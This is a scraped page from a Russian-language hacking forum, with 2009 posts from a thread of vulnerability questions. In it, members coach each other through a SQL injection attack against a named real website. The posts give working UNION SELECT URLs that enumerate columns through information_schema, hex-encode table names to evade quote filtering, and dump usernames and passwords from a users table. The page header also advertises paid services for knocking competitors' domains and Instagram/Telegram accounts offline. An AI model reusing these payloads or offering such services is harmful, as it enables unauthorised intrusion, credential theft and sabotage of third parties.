УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.

		Форум АНТИЧАТ > БЕЗОПАСНОСТЬ_OLD > Уязвимости
Ваши вопросы по уязвимостям.

Страница 873 из 1393

873

Опции темы

Поиск в этой теме

Опции просмотра

#8721

27.08.2009, 20:13

jecka3000

Постоянный

Регистрация: 15.03.2008

Сообщений: 441

Провел на форуме:
2052341

Репутация: 95

ElteRUS, читал, но просто прочитать, а потом раскрутить любую скулю сложно...

нашел интересные имена таблиц, users и userlist, подставляю их в запрос:

http://www.aawow.info/question2.php?id=-31+union+select+column_name+from+information_schem a.columns+where+table_name=7573657273

выводит WoW в тайтле.
Как получить всю интересующую нас инфу из этой таблицы? Если возможно, то без Limit?

#8722

27.08.2009, 20:17

.:[melkiy]:.

Постоянный

Регистрация: 25.01.2009

Сообщений: 368

Провел на форуме:
5290740

Репутация: 912

group_concat()

_http://www.aawow.info/question2.php?id=-31+union+select+group_concat(column_name)+from+inf ormation_schema.columns+where+table_name=0x7573657 26c697374

0x757365726c697374 = userlist

Последний раз редактировалось .:[melkiy]:.; 27.08.2009 в 20:22..

#8723

27.08.2009, 20:19

wolmer

Постоянный

Регистрация: 12.05.2009

Сообщений: 395

Провел на форуме:
4761503

Репутация: 229

Цитата:

Сообщение от jecka3000

Если не ошибаюсь то надо не table_name а table_schema
Темболее нужно в хекс коде (точнее: 0x + HEX) подставлять если работаешь через where (если фильтруются ковычки)

Последний раз редактировалось wolmer; 27.08.2009 в 20:21..

#8724

27.08.2009, 20:38

Flair

Познающий

Регистрация: 07.05.2009

Сообщений: 70

Провел на форуме:
420226

Репутация: 38

Сильно не пинайте
как подкючится к чужой БД, естественно зная логин и пороль

))

#8725

27.08.2009, 20:45

jecka3000

Постоянный

Регистрация: 15.03.2008

Сообщений: 441

Провел на форуме:
2052341

Репутация: 95

в таблице users оказалисьнесколько интересных записей: name, pass

Делаю запрос:
http://www.aawow.info/question2.php?id=-31+union+select+concat(name,0x20,pass)+from+0x7573 657273

Пробовал переводить в хекс и нэйм и пасс, ничего хорошего не выходит...

#8726

27.08.2009, 20:50

DrAssault

Участник форума

Регистрация: 14.11.2008

Сообщений: 149

Провел на форуме:
950638

Репутация: 256

Отправить сообщение для DrAssault с помощью ICQ

Цитата:

Сообщение от Flair

Сильно не пинайте
как подкючится к чужой БД, естественно зная логин и пороль

))

Заюзать скрипт или прогу

если есстественно разрешен конект из вне...

#8727

27.08.2009, 20:50

.:[melkiy]:.

Постоянный

Регистрация: 25.01.2009

Сообщений: 368

Провел на форуме:
5290740

Репутация: 912

Цитата:

Сообщение от jecka3000

жжёшь, ты читал хоть что-то?

Цитата:

Сообщение от jecka3000

http://www.aawow.info/question2.php?id=-31+union+select+concat(name,0x20,pass)+from+0x7573 657273

_http://www.aawow.info/question2.php?id=-31+union+select+concat_ws(0x3a,id,name,pass)+from+ aawowinf_mrlink.users

Последний раз редактировалось .:[melkiy]:.; 27.08.2009 в 20:59..

#8728

27.08.2009, 20:53

DrAssault

Участник форума

Регистрация: 14.11.2008

Сообщений: 149

Провел на форуме:
950638

Репутация: 256

Цитата:

Сообщение от jecka3000

Пипец фрукт, ты читать когда пойдешь? БД глянь в которой находится таблица, вероятно, что таблица users не находится в текущей БД... по поводу перевода в хекс промолчу пожалуй...

Цитата:

Сообщение от wolmer

Если не ошибаюсь то надо не table_name а table_schema

Ошибаешься.

Последний раз редактировалось DrAssault; 27.08.2009 в 20:56..